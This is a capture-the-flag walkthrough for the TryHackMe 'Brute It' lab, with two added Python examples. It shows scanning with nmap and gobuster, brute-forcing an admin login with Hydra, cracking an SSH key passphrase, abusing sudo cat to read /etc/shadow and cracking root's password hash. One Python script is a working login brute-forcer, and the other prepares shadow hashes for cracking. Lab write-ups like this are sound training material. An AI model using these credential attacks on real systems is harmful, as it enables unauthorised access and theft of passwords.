TryHackMe: Brute It Walkthrough

Task [1]: About this box

Task [2]: Reconnaissance

To gather information about open ports, perform an nmap scan. I used the command: nmap -sSV -Pn MACHINE_IP (a SYN scan with service/version detection, skipping host discovery).

For directory brute forcing the tool gobuster is used. I used the command: gobuster dir -u http://MACHINE_IP --wordlist /usr/share/wordlists/dirb/common.txt

Task [3]: Getting a shell

Start with the admin page. It is a simple login page.

Looking at the page source, we find a comment addressed to the user John saying that the username is admin.

We can use the well-known password-cracking tool Hydra to brute-force the password for the username admin. Command used: hydra -l admin -P rockyou.txt MACHINE_IP http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid" -V. The F= part tells Hydra which string marks a failed login; any response without it is treated as a hit, so the string must match the page's error message exactly.

After a few attempts we got the password, which is the answer to question 1.
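As an added example (not part of the original walkthrough), here is the logic behind that Hydra command written out in Python: a throwaway local stand-in for the /admin/index.php form answers POST requests, and a loop over a constructed mini wordlist treats any response that does not contain the failure string as a hit, exactly as Hydra's F= condition does. The server, the credentials and the wordlist are constructed for the demo and are not the box's real values.

```python
"""Added example, not from the walkthrough: a minimal re-implementation of what
`hydra http-post-form` does, run against a throwaway local login page so it
works offline. The credentials, wordlist and page below are constructed."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the box's /admin/index.php: same form fields
# (user/pass) and the same failure string the Hydra command keys on.
DEMO_USER, DEMO_PASS = "admin", "sunshine"
FAIL_MARKER = "Username or password invalid"
# Constructed mini wordlist standing in for rockyou.txt.
DEMO_WORDLIST = ["123456", "password", "letmein", "sunshine", "qwerty"]


class FakeAdminLogin(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        ok = form.get("user") == [DEMO_USER] and form.get("pass") == [DEMO_PASS]
        body = "Welcome admin" if ok else FAIL_MARKER
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body.encode())

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind to a free localhost port and serve in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), FakeAdminLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


# Opener with no proxy handler, so http_proxy in the environment cannot
# redirect the localhost request.
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def try_login(url, user, password):
    """POST user=...&pass=... like the real form and return the response body."""
    data = urllib.parse.urlencode({"user": user, "pass": password}).encode()
    with _OPENER.open(url, data=data, timeout=5) as resp:
        return resp.read().decode()


def brute_force(url, user, wordlist, fail_marker=FAIL_MARKER):
    """Hydra's F= logic: a response that does NOT contain the failure string
    counts as success. Returns the first password that passes, else None."""
    for candidate in wordlist:
        if fail_marker not in try_login(url, user, candidate):
            return candidate
    return None


def run_demo(wordlist=DEMO_WORDLIST):
    """Spin up the fake admin page, run the attack, tear the server down."""
    srv = start_server()
    try:
        url = "http://127.0.0.1:%d/admin/index.php" % srv.server_address[1]
        return brute_force(url, DEMO_USER, wordlist)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("cracked:", run_demo())
```

If the failure string is wrong (a typo, or the real page answers a failed login with a redirect instead of the text), every attempt looks like a success, which is why a Hydra run that "finds" the very first password in the list should be re-checked by logging in by hand.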

After successfully logging in we got an RSA private key and the answer to question 4.

The following screenshot shows the RSA key:

Using the command wget http://MACHINE_IP/admin/panel/id_rsa we can download the RSA key to our local system.

ssh2john.py converts the passphrase-protected RSA key into a hash format that John the Ripper understands. The command used is: /usr/share/john/ssh2john.py id_rsa > idrsa.txt

Using John the Ripper we can run a dictionary attack against the key's passphrase with the wordlist rockyou.txt.

Command used: john idrsa.txt --wordlist=rockyou.txt. This gives us the passphrase of the RSA private key.

During information gathering we learned that port 22 is open and an SSH service is running. Using the RSA key and the passphrase we can try connecting to the SSH server.

Command used: ssh john@MACHINE_IP -i id_rsa (enter the cracked passphrase when prompted). If SSH refuses the key because its permissions are too open, run chmod 600 id_rsa first.

We got an SSH shell as user john. Take the user flag.

Task [4]: Privilege Escalation

Using sudo -l we can check which commands the user may run with sudo. We find that user john can run /bin/cat as root.

Checking GTFOBins to see whether /bin/cat can be abused for privilege escalation. Yes, it can: cat running as root can read any file on the system.

Following the steps given on GTFOBins we can read /etc/shadow, which contains the password hashes of the system users and is normally readable only by root.

Make a file named 'hashes', copy the contents of the shadow file into it, and use john with rockyou.txt to crack the hashes. This gives us the password of root.

Command used: john hashes --wordlist=rockyou.txt
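As an added example (not from the walkthrough), the following Python snippet does the "make a hashes file" step with a little more care: it keeps only the shadow entries that actually carry a hash, skips locked or passwordless accounts, and names the hash algorithm so the right john --format can be picked. The shadow lines are constructed for the demo, not copied from the box.

```python
"""Added example, not from the walkthrough: filter /etc/shadow down to the
entries worth cracking and label their hash algorithm. The shadow lines
below are constructed for the demo, not taken from the box."""

# Modular-crypt identifier ($id$...) -> algorithm name.
HASH_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

# Constructed sample: two sha512crypt accounts, one yescrypt account, two
# locked system accounts, and one account locked after a password was set.
SAMPLE_SHADOW = """\
root:$6$saltsalt$constructedsha512hashforroot:18500:0:99999:7:::
daemon:*:18474:0:99999:7:::
john:$6$saltsalt$constructedsha512hashforjohn:18500:0:99999:7:::
sshd:!:18474:0:99999:7:::
alice:$y$j9T$saltsaltsaltsalt$constructedyescrypthash:19000:0:99999:7:::
bob:!$6$saltsalt$hashofalockedaccount:18500:0:99999:7:::
"""


def crackable_entries(shadow_text):
    """Return (user, hash, algorithm) for each line that carries a usable hash.

    A password field of '', '*', '!' or '!!' means no password or a locked
    account; a '!' in front of a hash means the account was locked after a
    password was set (the old hash is still there but no longer logs in).
    """
    found = []
    for line in shadow_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw_hash = fields[0], fields[1]
        if not pw_hash.startswith("$"):
            continue
        algo = HASH_IDS.get(pw_hash.split("$")[1], "unknown")
        found.append((user, pw_hash, algo))
    return found


def write_hashes_file(shadow_text, path):
    """Write user:hash lines, the layout john accepts straight from shadow.
    Returns the number of entries written."""
    entries = crackable_entries(shadow_text)
    with open(path, "w") as fh:
        for user, pw_hash, _ in entries:
            fh.write(f"{user}:{pw_hash}\n")
    return len(entries)


if __name__ == "__main__":
    for user, _, algo in crackable_entries(SAMPLE_SHADOW):
        print(f"{user}: {algo}")
    print("written:", write_hashes_file(SAMPLE_SHADOW, "hashes"))
```

For the $6$ entries john's --format=sha512crypt applies directly; $y$ (yescrypt, the default on recent Ubuntu and Debian) is usually cracked through the generic --format=crypt, which hands the work to the system libcrypt. If password reuse is suspected, the locked-with-hash case (bob above) is still worth a run after stripping the leading '!'.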

Use the su command to switch to root. And yes, we are root now. Get the root flag.

Successfully completed the room :-)

Thank you!!!

Sakshi Aggarwal

Digital forensics enthusiast | Cyber security | Bug hunter | Java | Python | Analyzer